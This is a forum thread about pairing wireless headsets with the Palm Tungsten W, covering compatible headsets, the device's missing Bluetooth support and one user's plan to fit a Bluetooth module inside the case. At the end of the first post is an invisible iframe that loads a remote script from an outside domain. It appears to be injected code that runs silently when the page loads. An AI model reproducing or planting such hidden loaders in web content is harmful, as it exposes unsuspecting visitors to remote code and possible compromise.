Is there a way to get a wireless headset to a Tungsten W?
Bluetooth SD Cards does not seem to work because they have no support for voice profile/voice recognition.
Maybe there is some new device on the market??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
The Jabra Freespeak works with the Tungsten W. It is a bit big because you have to have the dongle portion but that is the only way to do it. Even if the bluetooth SDIO card had a headset profile it would still not work because the audio in the Tungsten W is ONLY patched to that jack at the top of the device. It is not sent to the SDIO port at all or anywhere else for that matter. Trust me I looked into this thoroughly!
Do you know if Palm will find out that they missed something when they did not have Bluetooth in Tungsten W?
It seems to me that they have made a PDAphone which could be better.
Any comments?
It seems to me that they have made a PDAphone which could be better.
I think this goes without saying for all pdaPhones on the market.
There are so many variables that go into a product like this and they have to draw some lines around price, function, etc. I think they should have made it so that you could talk on it like a Treo. It seems that this would not have required a lot of engineering to pull off. I also agree, that in the absence of being able to use it like a hone, certainly something of this price range ought to have had Bluetooth capability. Either of these would have been acceptable. Neither, I think, is a mistake. I say this primarily because the market has moved on. Time will tell, as always.
They also have a case for the phone that has a mic/speaker built in for talking on it like a phone. That is supposed to be available in April.
I disassembled the T/W and found a perfect place to put the Bluetooth module, now its a matter of building a shielded wire harness for the battery and connection to the phone's 2.5mm jack from the inside (in case you want to use the original headset w/out bluetooth) and the battery voltage for both the T/W and Bluetooth is the same (they will have to share power), given the T/W is good for about 11hrs, I suspect 5hrs of talk time w/Bluetooth is reasonable, and I can more than live with that.
I have to put kapton tape to electrically isolate the board from the shielded box on the T/W main board (28mm x 42mm). I need 2.9mm of height (there is 4.2mm) and 21mm x 34mm for the Bluetooth board and I have 1.3mm of gap still left, I plan to use thermally conductive grease and a aluminum plate adhesive mounted to the plastic back of the T/W so that it will sit on top of the Bluetooth module to remove any excess heat that might develop from module.
I also need to adapt the module turn-on/off button (I have to think about how to engineer it so to look factory made).
Once I have all the materials built It should take about an hour to do.
I have Palm Tungsten W i want to know how do i use Bluetooth Headset with this device it’s very difficult to use a headset with wire please help me out.
if i can use the Bluetooth Headsets which is compatible please suggest me.
